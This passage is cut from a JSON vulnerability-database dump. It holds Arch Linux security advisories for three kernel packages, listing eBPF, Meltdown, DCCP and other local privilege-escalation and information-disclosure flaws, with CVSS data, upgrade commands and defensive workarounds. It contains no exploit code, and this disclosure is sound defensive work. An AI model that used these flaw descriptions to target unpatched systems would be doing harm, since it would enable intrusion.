nux.org/CVE-2017-17857\nhttps://security.archlinux.org/CVE-2017-17862\nhttps://security.archlinux.org/CVE-2017-17863\nhttps://security.archlinux.org/CVE-2017-17864\nhttps://security.archlinux.org/CVE-2017-5754\nhttps://security.archlinux.org/CVE-2017-8824", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-05T00:00:00", "type": "archlinux", "title": "[ASA-201801-1] linux: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": 
"HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-16995", "CVE-2017-16996", "CVE-2017-17449", "CVE-2017-17558", "CVE-2017-17712", "CVE-2017-17805", "CVE-2017-17806", "CVE-2017-17852", "CVE-2017-17853", "CVE-2017-17854", "CVE-2017-17855", "CVE-2017-17856", "CVE-2017-17857", "CVE-2017-17862", "CVE-2017-17863", "CVE-2017-17864", "CVE-2017-5754", "CVE-2017-8824"], "modified": "2018-01-05T00:00:00", "id": "ASA-201801-1", "href": "https://security.archlinux.org/ASA-201801-1", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:34:05", "description": "Arch Linux Security Advisory ASA-201801-3\n=========================================\n\nSeverity: High\nDate : 2018-01-05\nCVE-ID : CVE-2017-16995 CVE-2017-16996 CVE-2017-17449 CVE-2017-17558\nCVE-2017-17712 CVE-2017-17805 CVE-2017-17806 CVE-2017-17852\nCVE-2017-17853 CVE-2017-17854 CVE-2017-17855 CVE-2017-17856\nCVE-2017-17857 CVE-2017-17862 CVE-2017-17863 CVE-2017-17864\nCVE-2017-5754 CVE-2017-8824\nPackage : linux-zen\nType : multiple issues\nRemote : No\nLink : https://security.archlinux.org/AVG-571\n\nSummary\n=======\n\nThe package linux-zen before version 4.14.11-1 is vulnerable to\nmultiple issues including access restriction bypass, denial of service,\nprivilege escalation and information disclosure.\n\nResolution\n==========\n\nUpgrade to 4.14.11-1.\n\n# pacman -Syu \"linux-zen>=4.14.11-1\"\n\nThe problems have been fixed upstream in version 4.14.11.\n\nWorkaround\n==========\n\nBPF related issues can be circumvented by disabling unprivileged BPF:\n\n 
sysctl -w kernel.unprivileged_bpf_disabled=1\n\nOn systems that do not already have the dccp module loaded,\nCVE-2017-8824 can be mitigated by disabling it:\n\n echo >> /etc/modprobe.d/disable-dccp.conf install dccp false\n\nDescription\n===========\n\n- CVE-2017-16995 (privilege escalation)\n\nAn arbitrary memory r/w access issue was found in the Linux kernel\nbefore 4.14.9, 4.9.72 compiled with the eBPF bpf(2) system call\n(CONFIG_BPF_SYSCALL) support. The issue could occur due to calculation\nerrors in the eBPF verifier module, triggered by user supplied\nmalicious BPF program. An unprivileged user could use this flaw to\nescalate their privileges on a system. Setting parameter\n\"kernel.unprivileged_bpf_disabled=1\" prevents such privilege escalation\nby restricting access to bpf(2) call.\n\n- CVE-2017-16996 (privilege escalation)\n\nAn arbitrary memory r/w access issue was found in the Linux kernel\nbefore 4.14.9 compiled with the eBPF bpf(2) system call\n(CONFIG_BPF_SYSCALL) support. The issue could occur due to calculation\nerrors in the eBPF verifier module, triggered by user supplied\nmalicious BPF program. An unprivileged user could use this flaw to\nescalate their privileges on a system. 
Setting parameter\n\"kernel.unprivileged_bpf_disabled=1\" prevents such privilege escalation\nby restricting access to bpf(2) call.\n\n- CVE-2017-17449 (information disclosure)\n\nThe __netlink_deliver_tap_skb function in net/netlink/af_netlink.c in\nthe Linux kernel before 4.14.11, 4.9.74, 4.4.109, 3.18.91 and 3.16.52\nwhen CONFIG_NLMON is enabled, does not restrict observations of Netlink\nmessages to a single net namespace, which allows local users to obtain\nsensitive information by leveraging the CAP_NET_ADMIN capability to\nsniff an nlmon interface for all Netlink activity on the system.\n\n- CVE-2017-17558 (denial of service)\n\nThe usb_destroy_configuration function in drivers/usb/core/config.c in\nthe USB core subsystem in the Linux kernel before 4.14.8, 4.9.71,\n4.4.107, 3.18.89, 3.16.52 and 3.2.97 does not consider the maximum\nnumber of configurations and interfaces before attempting to release\nresources, which allows local users to cause a denial of service (out-\nof-bounds write access) or possibly have unspecified other impact via a\ncrafted USB device.\n\n- CVE-2017-17712 (privilege escalation)\n\nA flaw was found in the Linux kernel's implementation of raw_sendmsg\nbefore 4.14.11, 4.4.109 and 4.9.74 allowing a local attacker to panic\nthe kernel or possibly leak kernel addresses. 
A local attacker, with\nthe privilege of creating raw sockets, can abuse a possible race\ncondition when setting the socket option to allow the kernel to\nautomatically create ip header values and thus potentially escalate\ntheir privileges.\n\n- CVE-2017-17805 (denial of service)\n\nThe Salsa20 encryption algorithm in the Linux kernel before 4.14.8,\n4.9.71, 4.4.107, 3.18.89, 3.16.52 and 3.2.97 does not correctly handle\nzero-length inputs, allowing a local attacker able to use the AF_ALG-\nbased skcipher interface (CONFIG_CRYPTO_USER_API_SKCIPHER) to cause a\ndenial of service (uninitialized-memory free and kernel crash) or have\nunspecified other impact by executing a crafted sequence of system\ncalls that use the blkcipher_walk API. Both the generic implementation\n(crypto/salsa20_generic.c) and x86 implementation\n(arch/x86/crypto/salsa20_glue.c) of Salsa20 were vulnerable.\n\n- CVE-2017-17806 (denial of service)\n\nThe HMAC implementation (crypto/hmac.c) in the Linux kernel before\n4.14.8, 4.9.71, 4.4.107, 3.18.89, 3.16.52 and 3.2.97 does not validate\nthat the underlying cryptographic hash algorithm is unkeyed, allowing a\nlocal attacker able to use the AF_ALG-based hash interface\n(CONFIG_CRYPTO_USER_API_HASH) and the SHA-3 hash algorithm\n(CONFIG_CRYPTO_SHA3) to cause a kernel stack buffer overflow by\nexecuting a crafted sequence of system calls that encounter a missing\nSHA-3 initialization.\n\n- CVE-2017-17852 (denial of service)\n\nIt has been discovered that kernel/bpf/verifier.c in the Linux kernel\nbefore 4.14.9 allows local users to cause a denial of service (memory\ncorruption) or possibly have unspecified other impact by leveraging\nmishandling of 32-bit ALU ops.\n\n- CVE-2017-17853 (denial of service)\n\nIt has been discovered kernel/bpf/verifier.c in the Linux kernel before\n4.14.9 allows local users to cause a denial of service (memory\ncorruption) or possibly have unspecified other impact by leveraging\nincorrect BPF_RSH signed bounds 
calculations.\n\n- CVE-2017-17854 (denial of service)\n\nIt has been discovered that kernel/bpf/verifier.c in the Linux kernel\nbefore 4.14.9 allows local users to cause a denial of service (integer\noverflow and memory corruption) or possibly have unspecified other\nimpact by leveraging unrestricted integer values for pointer\narithmetic.\n\n- CVE-2017-17855 (denial of service)\n\nIt has been discovered that kernel/bpf/verifier.c in the Linux kernel\nbefore 4.14.9 allows local users to cause a denial of service (memory\ncorruption) or possibly have unspecified other impact by leveraging\nimproper use of pointers in place of scalars.\n\n- CVE-2017-17856 (denial of service)\n\nIt has been discovered that kernel/bpf/verifier.c in the Linux kernel\nbefore 4.14.9 allows local users to cause a denial of service (memory\ncorruption) or possibly have unspecified other impact by leveraging the\nlack of stack-pointer alignment enforcement.\n\n- CVE-2017-17857 (denial of service)\n\nThe check_stack_boundary function in kernel/bpf/verifier.c in the Linux\nkernel before 4.14.9 allows local users to cause a denial of service\n(memory corruption) or possibly have unspecified other impact by\nleveraging mishandling of invalid variable stack read operations.\n\n- CVE-2017-17862 (denial of service)\n\nIt has been discovered that kernel/bpf/verifier.c in the Linux kernel\nbefore 4.14.9 and 4.9.72 ignore unreachable code, even though it would\nstill be processed by JIT compilers. 
This behavior, also considered an\nimproper branch-pruning logic issue, could possibly be used by local\nusers for denial of service.\n\n- CVE-2017-17863 (denial of service)\n\nIt has been discovered that kernel/bpf/verifier.c in the Linux kernel\nbefore 4.14.9 and 4.9.72 does not check the relationship between\npointer values and the BPF stack, which allows local users to cause a\ndenial of service (integer overflow or invalid memory access) or\npossibly have unspecified other impact.\n\n- CVE-2017-17864 (information disclosure)\n\nIt has been discovered that kernel/bpf/verifier.c in the Linux kernel\nbefore 4.14.9 and 4.9.73 mishandles states_equal comparisons between\nthe pointer data type and the UNKNOWN_VALUE data type, which allows\nlocal users to obtain potentially sensitive address information, aka a\n\"pointer leak.\"\n\n- CVE-2017-5754 (access restriction bypass)\n\nAn industry-wide issue was found in the way many modern microprocessor\ndesigns have implemented speculative execution of instructions (a\ncommonly used performance optimization).\nThis variant (\"Rogue Data Load\") relies on the fact that, on impacted\nmicroprocessors, during speculative execution of instruction permission\nfaults, exception generation triggered by a faulting access is\nsuppressed until the retirement of the whole instruction block. In a\ncombination with the fact that memory accesses may populate the cache\neven when the block is being dropped and never committed (executed), an\nunprivileged local attacker could use this flaw to read memory from\narbitrary addresses, including privileged (kernel space) and all other\nprocesses running on the system by conducting targeted cache side-\nchannel attacks.\n\n- CVE-2017-8824 (privilege escalation)\n\nA use-after-free vulnerability was found in DCCP socket code affecting\nthe Linux kernel since 2.6.16. 
The dccp_disconnect function in\nnet/dccp/proto.c allows local users to gain privileges or cause a\ndenial of service via an AF_UNSPEC connect system call during the\nDCCP_LISTEN state.\n\nImpact\n======\n\nA local unprivileged attacker is able to escalate privileges, crash the\nsystem, read memory from arbitrary addresses including from the kernel\nand all other processes running on the system or obtain sensitive\ninformation by sniffing an nlmon interface for all Netlink activity on\nthe system.\n\nReferences\n==========\n\nhttps://bugs.archlinux.org/task/56832\nhttps://bugs.chromium.org/p/project-zero/issues/detail?id=1454\nhttp://www.openwall.com/lists/oss-security/2017/12/21/2\nhttps://git.kernel.org/linus/95a762e2c8c942780948091f8f2a4f32fce1ac6f\nhttps://git.kernel.org/linus/0c17d1d2c61936401f4702e1846e2c19b200f958\nhttps://git.kernel.org/linus/93c647643b48f0131f02e45da3bd367d80443291\nhttps://github.com/google/syzkaller/blob/master/docs/linux/found_bugs_usb.md\nhttps://git.kernel.org/linus/48a4ff1c7bb5a32d2e396b03132d20d552c0eca7\nhttp://openwall.com/lists/oss-security/2017/12/12/7\nhttps://git.kernel.org/linus/8f659a03a0ba9289b9aeb9b4470e6fb263d6f483\nhttps://git.kernel.org/linus/ecaaab5649781c5a0effdaf298a925063020500e\nhttps://git.kernel.org/linus/af3ff8045bbf3e32f1a448542e73abb4c8ceb6f1\nhttps://git.kernel.org/linus/468f6eafa6c44cb2c5d8aad35e12f06c240a812a\nhttps://git.kernel.org/linus/4374f256ce8182019353c0c639bb8d0695b4c941\nhttps://git.kernel.org/linus/bb7f0f989ca7de1153bd128a40a71709e339fa03\nhttps://git.kernel.org/linus/179d1c5602997fef5a940c6ddcf31212cbfebd14\nhttps://git.kernel.org/linus/a5ec6ae161d72f01411169a938fa5f8baea16e8f\nhttps://git.kernel.org/linus/ea25f914dc164c8d56b36147ecc86bc65f83c469\nhttps://git.kernel.org/linus/c131187db2d3fa2f8bf32fdf4e9a4ef805168467\nhttps://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=d75d3ee237cee9068022117e059b64bbab617f3d\nhttps://git.kernel.org/linus/de31796c052e47c99b1bb342bc70a
a826733e862\nhttps://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=37435f7e80ef9adc32a69013c18f135e3f434244\nhttps://googleprojectzero.blogspot.com/2018/01/reading-privileged-memory-with-side.html\nhttps://meltdownattack.com\nhttps://xenbits.xen.org/xsa/advisory-254.html\nhttp://blog.cyberus-technology.de/posts/2018-01-03-meltdown.html\nhttps://git.kernel.org/linus/5aa90a84589282b87666f92b6c3c917c8080a9bf\nhttps://git.kernel.org/linus/00a5ae218d57741088068799b810416ac249a9ce\nhttps://git.kernel.org/linus/69c64866ce072dea1d1e59a0d61e0f66c0dffb76\nhttps://security.archlinux.org/CVE-2017-16995\nhttps://security.archlinux.org/CVE-2017-16996\nhttps://security.archlinux.org/CVE-2017-17449\nhttps://security.archlinux.org/CVE-2017-17558\nhttps://security.archlinux.org/CVE-2017-17712\nhttps://security.archlinux.org/CVE-2017-17805\nhttps://security.archlinux.org/CVE-2017-17806\nhttps://security.archlinux.org/CVE-2017-17852\nhttps://security.archlinux.org/CVE-2017-17853\nhttps://security.archlinux.org/CVE-2017-17854\nhttps://security.archlinux.org/CVE-2017-17855\nhttps://security.archlinux.org/CVE-2017-17856\nhttps://security.archlinux.org/CVE-2017-17857\nhttps://security.archlinux.org/CVE-2017-17862\nhttps://security.archlinux.org/CVE-2017-17863\nhttps://security.archlinux.org/CVE-2017-17864\nhttps://security.archlinux.org/CVE-2017-5754\nhttps://security.archlinux.org/CVE-2017-8824", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-05T00:00:00", "type": "archlinux", "title": "[ASA-201801-3] linux-zen: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": 
"HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-16995", "CVE-2017-16996", "CVE-2017-17449", "CVE-2017-17558", "CVE-2017-17712", "CVE-2017-17805", "CVE-2017-17806", "CVE-2017-17852", "CVE-2017-17853", "CVE-2017-17854", "CVE-2017-17855", "CVE-2017-17856", "CVE-2017-17857", "CVE-2017-17862", "CVE-2017-17863", "CVE-2017-17864", "CVE-2017-5754", "CVE-2017-8824"], "modified": "2018-01-05T00:00:00", "id": "ASA-201801-3", "href": "https://security.archlinux.org/ASA-201801-3", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:34:05", "description": "Arch Linux Security Advisory ASA-201801-4\n=========================================\n\nSeverity: High\nDate : 2018-01-05\nCVE-ID : CVE-2017-16995 CVE-2017-16996 CVE-2017-17448 CVE-2017-17449\nCVE-2017-17450 CVE-2017-17558 CVE-2017-17712 CVE-2017-17741\nCVE-2017-17805 CVE-2017-17806 CVE-2017-17852 CVE-2017-17853\nCVE-2017-17854 CVE-2017-17855 CVE-2017-17856 CVE-2017-17857\nCVE-2017-17862 CVE-2017-17863 CVE-2017-17864 CVE-2017-5754\nCVE-2017-8824\nPackage : linux-hardened\nType : multiple issues\nRemote : No\nLink : https://security.archlinux.org/AVG-574\n\nSummary\n=======\n\nThe package linux-hardened before version 4.14.11.a-1 is vulnerable to\nmultiple issues including access restriction bypass, denial of service,\nprivilege escalation and information disclosure.\n\nResolution\n==========\n\nUpgrade to 4.14.11.a-1.\n\n# pacman -Syu \"linux-hardened>=4.14.11.a-1\"\n\nThe problems have been fixed upstream in version 4.14.11.a.\n\nWorkaround\n==========\n\nBPF 
related issues can be circumvented by disabling unprivileged BPF:\n\n sysctl -w kernel.unprivileged_bpf_disabled=1\n\nOn systems that do not already have the dccp module loaded,\nCVE-2017-8824 can be mitigated by disabling it:\n\n echo >> /etc/modprobe.d/disable-dccp.conf install dccp false\n\nDescription\n===========\n\n- CVE-2017-16995 (privilege escalation)\n\nAn arbitrary memory r/w access issue was found in the Linux kernel\nbefore 4.14.9, 4.9.72 compiled with the eBPF bpf(2) system call\n(CONFIG_BPF_SYSCALL) support. The issue could occur due to calculation\nerrors in the eBPF verifier module, triggered by user supplied\nmalicious BPF program. An unprivileged user could use this flaw to\nescalate their privileges on a system. Setting parameter\n\"kernel.unprivileged_bpf_disabled=1\" prevents such privilege escalation\nby restricting access to bpf(2) call.\n\n- CVE-2017-16996 (privilege escalation)\n\nAn arbitrary memory r/w access issue was found in the Linux kernel\nbefore 4.14.9 compiled with the eBPF bpf(2) system call\n(CONFIG_BPF_SYSCALL) support. The issue could occur due to calculation\nerrors in the eBPF verifier module, triggered by user supplied\nmalicious BPF program. An unprivileged user could use this flaw to\nescalate their privileges on a system. 
Setting parameter\n\"kernel.unprivileged_bpf_disabled=1\" prevents such privilege escalation\nby restricting access to bpf(2) call.\n\n- CVE-2017-17448 (access restriction bypass)\n\nIt has been discovered that net/netfilter/nfnetlink_cthelper.c in the\nLinux kernel through 4.14.4 does not require the CAP_NET_ADMIN\ncapability for new, get, and del operations, which allows local users\nto bypass intended access restrictions because the nfnl_cthelper_list\ndata structure is shared across all net namespaces.\n\n- CVE-2017-17449 (information disclosure)\n\nThe __netlink_deliver_tap_skb function in net/netlink/af_netlink.c in\nthe Linux kernel before 4.14.11, 4.9.74, 4.4.109, 3.18.91 and 3.16.52\nwhen CONFIG_NLMON is enabled, does not restrict observations of Netlink\nmessages to a single net namespace, which allows local users to obtain\nsensitive information by leveraging the CAP_NET_ADMIN capability to\nsniff an nlmon interface for all Netlink activity on the system.\n\n- CVE-2017-17450 (access restriction bypass)\n\nIt has been discovered that net/netfilter/xt_osf.c in the Linux kernel\nthrough 4.14.4 does not require the CAP_NET_ADMIN capability for\nadd_callback and remove_callback operations, which allows local users\nto bypass intended access restrictions because the xt_osf_fingers data\nstructure is shared across all net namespaces.\n\n- CVE-2017-17558 (denial of service)\n\nThe usb_destroy_configuration function in drivers/usb/core/config.c in\nthe USB core subsystem in the Linux kernel before 4.14.8, 4.9.71,\n4.4.107, 3.18.89, 3.16.52 and 3.2.97 does not consider the maximum\nnumber of configurations and interfaces before attempting to release\nresources, which allows local users to cause a denial of service (out-\nof-bounds write access) or possibly have unspecified other impact via a\ncrafted USB device.\n\n- CVE-2017-17712 (privilege escalation)\n\nA flaw was found in the Linux kernel's implementation of raw_sendmsg\nbefore 4.14.11, 4.4.109 and 4.9.74 
allowing a local attacker to panic\nthe kernel or possibly leak kernel addresses. A local attacker, with\nthe privilege of creating raw sockets, can abuse a possible race\ncondition when setting the socket option to allow the kernel to\nautomatically create ip header values and thus potentially escalate\ntheir privileges.\n\n- CVE-2017-17741 (information disclosure)\n\nThe KVM implementation in the Linux kernel through 4.14.7 allows\nattackers to obtain potentially sensitive information from kernel\nmemory, aka a write_mmio stack-based out-of-bounds read, related to\narch/x86/kvm/x86.c and include/trace/events/kvm.h.\n\n- CVE-2017-17805 (denial of service)\n\nThe Salsa20 encryption algorithm in the Linux kernel before 4.14.8,\n4.9.71, 4.4.107, 3.18.89, 3.16.52 and 3.2.97 does not correctly handle\nzero-length inputs, allowing a local attacker able to use the AF_ALG-\nbased skcipher interface (CONFIG_CRYPTO_USER_API_SKCIPHER) to cause a\ndenial of service (uninitialized-memory free and kernel crash) or have\nunspecified other impact by executing a crafted sequence of system\ncalls that use the blkcipher_walk API. 
Both the generic implementation\n(crypto/salsa20_generic.c) and x86 implementation\n(arch/x86/crypto/salsa20_glue.c) of Salsa20 were vulnerable.\n\n- CVE-2017-17806 (denial of service)\n\nThe HMAC implementation (crypto/hmac.c) in the Linux kernel before\n4.14.8, 4.9.71, 4.4.107, 3.18.89, 3.16.52 and 3.2.97 does not validate\nthat the underlying cryptographic hash algorithm is unkeyed, allowing a\nlocal attacker able to use the AF_ALG-based hash interface\n(CONFIG_CRYPTO_USER_API_HASH) and the SHA-3 hash algorithm\n(CONFIG_CRYPTO_SHA3) to cause a kernel stack buffer overflow by\nexecuting a crafted sequence of system calls that encounter a missing\nSHA-3 initialization.\n\n- CVE-2017-17852 (denial of service)\n\nIt has been discovered that kernel/bpf/verifier.c in the Linux kernel\nbefore 4.14.9 allows local users to cause a denial of service (memory\ncorruption) or possibly have unspecified other impact by leveraging\nmishandling of 32-bit ALU ops.\n\n- CVE-2017-17853 (denial of service)\n\nIt has been discovered kernel/bpf/verifier.c in the Linux kernel before\n4.14.9 allows local users to cause a denial of service (memory\ncorruption) or possibly have unspecified other impact by leveraging\nincorrect BPF_RSH signed bounds calculations.\n\n- CVE-2017-17854 (denial of service)\n\nIt has been discovered that kernel/bpf/verifier.c in the Linux kernel\nbefore 4.14.9 allows local users to cause a denial of service (integer\noverflow and memory corruption) or possibly have unspecified other\nimpact by leveraging unrestricted integer values for pointer\narithmetic.\n\n- CVE-2017-17855 (denial of service)\n\nIt has been discovered that kernel/bpf/verifier.c in the Linux kernel\nbefore 4.14.9 allows local users to cause a denial of service (memory\ncorruption) or possibly have unspecified other impact by leveraging\nimproper use of pointers in place of scalars.\n\n- CVE-2017-17856 (denial of service)\n\nIt has been discovered that kernel/bpf/verifier.c in the Linux 
kernel\nbefore 4.14.9 allows local users to cause a denial of service (memory\ncorruption) or possibly have unspecified other impact by leveraging the\nlack of stack-pointer alignment enforcement.\n\n- CVE-2017-17857 (denial of service)\n\nThe check_stack_boundary function in kernel/bpf/verifier.c in the Linux\nkernel before 4.14.9 allows local users to cause a denial of service\n(memory corruption) or possibly have unspecified other impact by\nleveraging mishandling of invalid variable stack read operations.\n\n- CVE-2017-17862 (denial of service)\n\nIt has been discovered that kernel/bpf/verifier.c in the Linux kernel\nbefore 4.14.9 and 4.9.72 ignore unreachable code, even though it would\nstill be processed by JIT compilers. This behavior, also considered an\nimproper branch-pruning logic issue, could possibly be used by local\nusers for denial of service.\n\n- CVE-2017-17863 (denial of service)\n\nIt has been discovered that kernel/bpf/verifier.c in the Linux kernel\nbefore 4.14.9 and 4.9.72 does not check the relationship between\npointer values and the BPF stack, which allows local users to cause a\ndenial of service (integer overflow or invalid memory access) or\npossibly have unspecified other impact.\n\n- CVE-2017-17864 (information disclosure)\n\nIt has been discovered that kernel/bpf/verifier.c in the Linux kernel\nbefore 4.14.9 and 4.9.73 mishandles states_equal comparisons between\nthe pointer data type and the UNKNOWN_VALUE data type, which allows\nlocal users to obtain potentially sensitive address information, aka a\n\"pointer leak.\"\n\n- CVE-2017-5754 (access restriction bypass)\n\nAn industry-wide issue was found in the way many modern microprocessor\ndesigns have implemented speculative execution of instructions (a\ncommonly used performance optimization).\nThis variant (\"Rogue Data Load\") relies on the fact that, on impacted\nmicroprocessors, during speculative execution of instruction permission\nfaults, exception generation triggered by a 
faulting access is\nsuppressed until the retirement of the whole instruction block. In a\ncombination with the fact that memory accesses may populate the cache\neven when the block is being dropped and never committed (executed), an\nunprivileged local attacker could use this flaw to read memory from\narbitrary addresses, including privileged (kernel space) and all other\nprocesses running on the system by conducting targeted cache side-\nchannel attacks.\n\n- CVE-2017-8824 (privilege escalation)\n\nA use-after-free vulnerability was found in DCCP socket code affecting\nthe Linux kernel since 2.6.16. The dccp_disconnect function in\nnet/dccp/proto.c allows local users to gain privileges or cause a\ndenial of service via an AF_UNSPEC connect system call during the\nDCCP_LISTEN state.\n\nImpact\n======\n\nA local unprivileged attacker is able to escalate privileges, crash the\nsystem, read memory from arbitrary addresses including from the kernel\nand all other processes running on the system or obtain sensitive\ninformation by sniffing an nlmon interface for all Netlink activity on\nthe 
system.\n\nReferences\n==========\n\nhttps://bugs.archlinux.org/task/56832\nhttps://bugs.chromium.org/p/project-zero/issues/detail?id=1454\nhttp://www.openwall.com/lists/oss-security/2017/12/21/2\nhttps://git.kernel.org/linus/95a762e2c8c942780948091f8f2a4f32fce1ac6f\nhttps://git.kernel.org/linus/0c17d1d2c61936401f4702e1846e2c19b200f958\nhttps://git.kernel.org/linus/4b380c42f7d00a395feede754f0bc2292eebe6e5\nhttps://git.kernel.org/linus/93c647643b48f0131f02e45da3bd367d80443291\nhttps://git.kernel.org/linus/916a27901de01446bcf57ecca4783f6cff493309\nhttps://github.com/google/syzkaller/blob/master/docs/linux/found_bugs_usb.md\nhttps://git.kernel.org/linus/48a4ff1c7bb5a32d2e396b03132d20d552c0eca7\nhttp://openwall.com/lists/oss-security/2017/12/12/7\nhttps://git.kernel.org/linus/8f659a03a0ba9289b9aeb9b4470e6fb263d6f483\nhttps://git.kernel.org/linus/e39d200fa5bf5b94a0948db0dae44c1b73b84a56\nhttps://git.kernel.org/linus/ecaaab5649781c5a0effdaf298a925063020500e\nhttps://git.kernel.org/linus/af3ff8045bbf3e32f1a448542e73abb4c8ceb6f1\nhttps://git.kernel.org/linus/468f6eafa6c44cb2c5d8aad35e12f06c240a812a\nhttps://git.kernel.org/linus/4374f256ce8182019353c0c639bb8d0695b4c941\nhttps://git.kernel.org/linus/bb7f0f989ca7de1153bd128a40a71709e339fa03\nhttps://git.kernel.org/linus/179d1c5602997fef5a940c6ddcf31212cbfebd14\nhttps://git.kernel.org/linus/a5ec6ae161d72f01411169a938fa5f8baea16e8f\nhttps://git.kernel.org/linus/ea25f914dc164c8d56b36147ecc86bc65f83c469\nhttps://git.kernel.org/linus/c131187db2d3fa2f8bf32fdf4e9a4ef805168467\nhttps://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=d75d3ee237cee9068022117e059b64bbab617f3d\nhttps://git.kernel.org/linus/de31796c052e47c99b1bb342bc70aa826733e862\nhttps://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=37435f7e80ef9adc32a69013c18f135e3f434244\nhttps://googleprojectzero.blogspot.com/2018/01/reading-privileged-memory-with-side.html\nhttps://meltdownattack.com\nhttps://xenbits.xen.org/xsa
/advisory-254.html\nhttp://blog.cyberus-technology.de/posts/2018-01-03-meltdown.html\nhttps://git.kernel.org/linus/5aa90a84589282b87666f92b6c3c917c8080a9bf\nhttps://git.kernel.org/linus/00a5ae218d57741088068799b810416ac249a9ce\nhttps://git.kernel.org/linus/69c64866ce072dea1d1e59a0d61e0f66c0dffb76\nhttps://security.archlinux.org/CVE-2017-16995\nhttps://security.archlinux.org/CVE-2017-16996\nhttps://security.archlinux.org/CVE-2017-17448\nhttps://security.archlinux.org/CVE-2017-17449\nhttps://security.archlinux.org/CVE-2017-17450\nhttps://security.archlinux.org/CVE-2017-17558\nhttps://security.archlinux.org/CVE-2017-17712\nhttps://security.archlinux.org/CVE-2017-17741\nhttps://security.archlinux.org/CVE-2017-17805\nhttps://security.archlinux.org/CVE-2017-17806\nhttps://security.archlinux.org/CVE-2017-17852\nhttps://security.archlinux.org/CVE-2017-17853\nhttps://security.archlinux.org/CVE-2017-17854\nhttps://security.archlinux.org/CVE-2017-17855\nhttps://security.archlinux.org/CVE-2017-17856\nhttps://security.archlinux.org/CVE-2017-17857\nhttps://security.archlinux.org/CVE-2017-17862\nhttps://security.archlinux.org/CVE-2017-17863\nhttps://security.archlinux.org/CVE-2017-17864\nhttps://security.archlinux.org/CVE-2017-5754\nhttps://security.archlinux.org/CVE-2017-8824", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-05T00:00:00", "type": "archlinux", "title": "[ASA-201801-4] linux-hardened: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, 
"cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-16995", "CVE-2017-16996", "CVE-2017-17448", "CVE-2017-17449", "CVE-2017-17450", "CVE-2017-17558", "CVE-2017-17712", "CVE-2017-17741", "CVE-2017-17805", "CVE-2017-17806", "CVE-2017-17852", "CVE-2017-17853", "CVE-2017-17854", "CVE-2017-17855", "CVE-2017-17856", "CVE-2017-17857", "CVE-2017-17862", "CVE-2017-17863", "CVE-2017-17864", "CVE-2017-5754", "CVE-2017-8824"], "modified": "2018-01-05T00:00:00", "id": "ASA-201801-4", "href": "https://security.archlinux.org/ASA-201801-4", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "mageia": [{"lastseen": "2022-04-18T11:19:34", "description": "This kernel-linus update provides an upgrade to the 4.14 longterm branch, currently based on 4.14.10. It also fixes at least the following security issues: An elevation of privilege vulnerability in the Broadcom wi-fi driver (CVE-2017-0786). Use-after-free vulnerability in the snd_pcm_info function in the ALSA subsystem in the Linux kernel allows attackers to gain privileges via unspecified vectors (CVE-2017-0861). Linux kernel built with the Kernel-based Virtual Machine(CONFIG_KVM) support is vulnerable 